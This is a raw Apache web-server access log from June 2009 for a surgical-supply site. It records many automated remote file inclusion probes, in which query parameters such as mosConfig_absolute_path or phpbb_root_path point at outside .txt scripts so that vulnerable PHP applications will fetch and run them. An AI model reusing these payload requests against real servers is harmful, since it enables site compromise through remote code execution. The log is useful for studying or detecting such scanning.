217.147.29.190 - - [24/Jun/2009:06:37:14 -0400] "GET /logs/access_log.Q109060800%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [24/Jun/2009:06:38:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.17.10.239 - - [24/Jun/2009:06:39:02 -0400] "GET //bbs/outlogin.php?_zb_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
85.17.10.239 - - [24/Jun/2009:06:39:02 -0400] "GET /logs//bbs/outlogin.php?_zb_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
85.17.10.239 - - [24/Jun/2009:06:39:02 -0400] "GET /logs/access_log.Q109051900//bbs/outlogin.php?_zb_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
209.172.33.230 - - [24/Jun/2009:06:39:23 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.172.33.230 - - [24/Jun/2009:06:39:23 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
209.172.33.230 - - [24/Jun/2009:06:39:23 -0400] "GET /logs/access_log.Q109053100//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
211.189.18.73 - - [24/Jun/2009:06:39:43 -0400] "GET /logs/access_log.Q109050700%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
155.212.232.66 - - [24/Jun/2009:06:39:44 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:06:39:44 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:06:39:45 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:06:39:45 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
38.99.44.103 - - [24/Jun/2009:06:39:50 -0400] "GET /logs/access_log.Q108110300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
211.189.18.73 - - [24/Jun/2009:06:39:52 -0400] "GET /logs/access_log.Q109050700%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
201.232.54.48 - - [24/Jun/2009:06:39:53 -0400] "GET /logs/access_log.Q109061800//administrator/components/com_moofaq/css/file_includer.php?file=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
201.232.54.48 - - [24/Jun/2009:06:39:53 -0400] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
201.232.54.48 - - [24/Jun/2009:06:39:53 -0400] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
201.232.54.48 - - [24/Jun/2009:06:39:57 -0400] "GET /logs/access_log.Q109061500//administrator/components/com_moofaq/css/file_includer.php?file=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
82.165.180.89 - - [24/Jun/2009:06:39:58 -0400] "GET /?sourcedir=http://www.atu.bz/IDv6.txt?%0D?? HTTP/1.1" 200 409 "-" "libwww-perl/5.79"
82.165.180.89 - - [24/Jun/2009:06:39:58 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.atu.bz/IDv6.txt?%0D?? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
82.165.180.89 - - [24/Jun/2009:06:39:58 -0400] "GET /logs/?sourcedir=http://www.atu.bz/IDv6.txt?%0D?? HTTP/1.1" 200 6778 "-" "libwww-perl/5.79"
211.189.18.73 - - [24/Jun/2009:06:39:59 -0400] "GET /logs/access_log.Q109050700%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.74.24.2 - - [24/Jun/2009:06:40:03 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
69.74.24.2 - - [24/Jun/2009:06:40:06 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
69.74.24.2 - - [24/Jun/2009:06:40:09 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
82.165.180.89 - - [24/Jun/2009:06:40:12 -0400] "GET /logs/error_log.Q109051900/?sourcedir=http://www.atu.bz/IDv6.txt?%0D?? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
69.74.24.2 - - [24/Jun/2009:06:40:12 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
69.74.24.2 - - [24/Jun/2009:06:40:12 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
69.74.24.2 - - [24/Jun/2009:06:40:17 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
69.74.24.2 - - [24/Jun/2009:06:40:20 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
69.74.24.2 - - [24/Jun/2009:06:40:24 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
69.74.24.2 - - [24/Jun/2009:06:40:29 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
69.74.24.2 - - [24/Jun/2009:06:40:31 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
69.74.24.2 - - [24/Jun/2009:06:40:32 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
69.74.24.2 - - [24/Jun/2009:06:40:55 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
69.74.24.2 - - [24/Jun/2009:06:41:01 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
69.74.24.2 - - [24/Jun/2009:06:41:09 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
69.74.24.2 - - [24/Jun/2009:06:41:12 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
69.74.24.2 - - [24/Jun/2009:06:41:17 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
155.212.232.66 - - [24/Jun/2009:06:41:39 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:06:41:39 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:06:41:40 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:06:41:40 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
69.74.24.2 - - [24/Jun/2009:06:41:40 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
69.74.24.2 - - [24/Jun/2009:06:41:45 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
69.74.24.2 - - [24/Jun/2009:06:42:01 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
69.74.24.2 - - [24/Jun/2009:06:42:04 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
69.74.24.2 - - [24/Jun/2009:06:42:05 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
66.249.71.57 - - [24/Jun/2009:06:42:23 -0400] "GET /images/store_handpc_section.jpg.png HTTP/1.1" 200 116192 "-" "Googlebot-Image/1.0"
116.121.201.70 - - [24/Jun/2009:06:43:16 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
116.121.201.70 - - [24/Jun/2009:06:43:17 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
116.121.201.70 - - [24/Jun/2009:06:43:17 -0400] "GET /logs/access_log.Q109060100%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
211.189.18.73 - - [24/Jun/2009:06:43:22 -0400] "GET /logs/access_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
211.189.18.73 - - [24/Jun/2009:06:43:23 -0400] "GET /logs/access_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.59.12.99 - - [24/Jun/2009:06:43:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
116.121.201.70 - - [24/Jun/2009:06:43:53 -0400] "GET /logs/access_log.Q109052400%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
193.243.139.4 - - [24/Jun/2009:06:44:00 -0400] "GET /logs/access_log.Q109052700//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:06:44:01 -0400] "GET /logs/access_log.Q109052700//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.803"
70.84.177.170 - - [24/Jun/2009:06:44:11 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://www.haruuu.com/id.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.811"
70.84.177.170 - - [24/Jun/2009:06:44:11 -0400] "GET /logs/access_log.Q109051700//components/com_flyspray/startdown.php?file=http://www.haruuu.com/id.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.811"
70.84.177.170 - - [24/Jun/2009:06:44:11 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.haruuu.com/id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.811"
70.84.177.170 - - [24/Jun/2009:06:44:11 -0400] "GET /logs/access_log.Q109052600//components/com_flyspray/startdown.php?file=http://www.haruuu.com/id.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.811"
200.161.199.102 - - [24/Jun/2009:06:44:19 -0400] "GET /logs/access_log.Q109061800//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
200.161.199.102 - - [24/Jun/2009:06:44:22 -0400] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
200.161.199.102 - - [24/Jun/2009:06:44:25 -0400] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
91.121.137.51 - - [24/Jun/2009:06:45:22 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
91.121.137.51 - - [24/Jun/2009:06:45:22 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
91.121.137.51 - - [24/Jun/2009:06:45:22 -0400] "GET /logs/access_log.Q109053100//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
91.121.137.51 - - [24/Jun/2009:06:45:27 -0400] "GET /logs/access_log.Q109061900//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
208.111.94.201 - - [24/Jun/2009:06:45:50 -0400] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
208.111.94.201 - - [24/Jun/2009:06:45:50 -0400] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
208.111.94.201 - - [24/Jun/2009:06:45:50 -0400] "GET /logs/access_log.Q109051600//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
70.84.177.170 - - [24/Jun/2009:06:48:29 -0400] "GET /logs/access_log.Q109061500%20//components/com_flyspray/startdown.php?file=http://www.haruuu.com/id.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.811"
70.84.177.170 - - [24/Jun/2009:06:48:30 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.haruuu.com/id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.811"
70.84.177.170 - - [24/Jun/2009:06:48:31 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://www.haruuu.com/id.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.811"
209.59.12.99 - - [24/Jun/2009:06:48:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.84.177.170 - - [24/Jun/2009:06:48:47 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.haruuu.com/id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.811"
70.84.177.170 - - [24/Jun/2009:06:48:47 -0400] "GET /logs/access_log.Q109061500%20//components/com_flyspray/startdown.php?file=http://www.haruuu.com/id.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.811"
70.84.177.170 - - [24/Jun/2009:06:48:48 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://www.haruuu.com/id.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.811"
70.84.177.170 - - [24/Jun/2009:06:48:51 -0400] "GET /logs/access_log.Q109061500%20//components/com_flyspray/startdown.php?file=http://www.haruuu.com/id.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.811"
70.84.177.170 - - [24/Jun/2009:06:48:51 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.haruuu.com/id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.811"
70.84.177.170 - - [24/Jun/2009:06:48:51 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://www.haruuu.com/id.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.811"
208.111.94.201 - - [24/Jun/2009:06:49:04 -0400] "GET /logs/access_log.Q109061200//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
193.243.139.4 - - [24/Jun/2009:06:49:24 -0400] "GET /logs/access_log.Q109061800///administrator/components/com_moofaq/css/file_includer.php?file=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:06:49:24 -0400] "GET ///administrator/components/com_moofaq/css/file_includer.php?file=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:06:49:24 -0400] "GET /logs///administrator/components/com_moofaq/css/file_includer.php?file=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
155.212.232.66 - - [24/Jun/2009:06:49:24 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:06:49:24 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:06:49:25 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:06:49:25 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
193.243.139.4 - - [24/Jun/2009:06:49:26 -0400] "GET /logs/access_log.Q109061800///administrator/components/com_moofaq/css/file_includer.php?file=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:06:49:26 -0400] "GET ///administrator/components/com_moofaq/css/file_includer.php?file=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:06:49:26 -0400] "GET /logs///administrator/components/com_moofaq/css/file_includer.php?file=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
124.138.156.3 - - [24/Jun/2009:06:49:32 -0400] "GET /include/lib.inc.php?site_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:06:49:32 -0400] "GET /logs/include/lib.inc.php?site_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:06:49:32 -0400] "GET /logs/access_log.Q109052800/include/lib.inc.php?site_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
69.94.125.100 - - [24/Jun/2009:06:49:34 -0400] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.94.125.100 - - [24/Jun/2009:06:49:34 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.94.125.100 - - [24/Jun/2009:06:49:34 -0400] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.94.125.100 - - [24/Jun/2009:06:49:36 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:06:49:44 -0400] "GET /logs/error_log.Q109052800/include/lib.inc.php?site_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
69.94.125.100 - - [24/Jun/2009:06:49:58 -0400] "GET /logs/access_log.Q109061100%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
193.243.139.4 - - [24/Jun/2009:06:50:02 -0400] "GET /logs/access_log.Q109050800//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:06:50:02 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:06:50:02 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:06:50:05 -0400] "GET /logs/access_log.Q109050800//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:06:50:06 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:06:50:06 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:06:50:27 -0400] "GET /logs/access_log.Q109061500///administrator/components/com_moofaq/css/file_includer.php?file=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:06:50:28 -0400] "GET /logs/access_log.Q109061500///administrator/components/com_moofaq/css/file_includer.php?file=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.803"
74.200.195.130 - - [24/Jun/2009:06:50:39 -0400] "GET //mail.inc.php?skin_board_path=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:06:50:39 -0400] "GET /logs//mail.inc.php?skin_board_path=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:06:50:39 -0400] "GET /logs/access_log.Q109052800//mail.inc.php?skin_board_path=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:06:50:42 -0400] "GET /logs//mail.inc.php?skin_board_path=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:06:50:43 -0400] "GET /logs/access_log.Q109052800%20%20//mail.inc.php?skin_board_path=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:06:50:43 -0400] "GET //mail.inc.php?skin_board_path=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
204.202.23.11 - - [24/Jun/2009:06:50:45 -0400] "GET /logs/access_log.Q109051700//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://fisherofmen.biz/phprealty/templates/languages/id.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.65"
204.202.23.11 - - [24/Jun/2009:06:50:46 -0400] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://fisherofmen.biz/phprealty/templates/languages/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.65"
204.202.23.11 - - [24/Jun/2009:06:50:46 -0400] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://fisherofmen.biz/phprealty/templates/languages/id.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.65"
74.200.195.130 - - [24/Jun/2009:06:50:48 -0400] "GET /logs/error_log.Q109052800//mail.inc.php?skin_board_path=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:06:50:51 -0400] "GET /logs/error_log.Q109052800%20%20//mail.inc.php?skin_board_path=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:06:51:01 -0400] "GET /logs/access_log.Q109052800//mail.inc.php?skin_board_path=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:06:51:01 -0400] "GET /logs//mail.inc.php?skin_board_path=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:06:51:01 -0400] "GET //mail.inc.php?skin_board_path=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
155.212.232.66 - - [24/Jun/2009:06:51:06 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
155.212.232.66 - - [24/Jun/2009:06:51:06 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
74.200.195.130 - - [24/Jun/2009:06:51:07 -0400] "GET /logs/error_log.Q109052800//mail.inc.php?skin_board_path=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
155.212.232.66 - - [24/Jun/2009:06:51:07 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
155.212.232.66 - - [24/Jun/2009:06:51:07 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
124.138.156.3 - - [24/Jun/2009:06:51:57 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:06:51:57 -0400] "GET /logs/access_log.Q109061200/includes/ktedit/toolbar.php?dirDepth=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
124.138.156.3 - - [24/Jun/2009:06:51:57 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
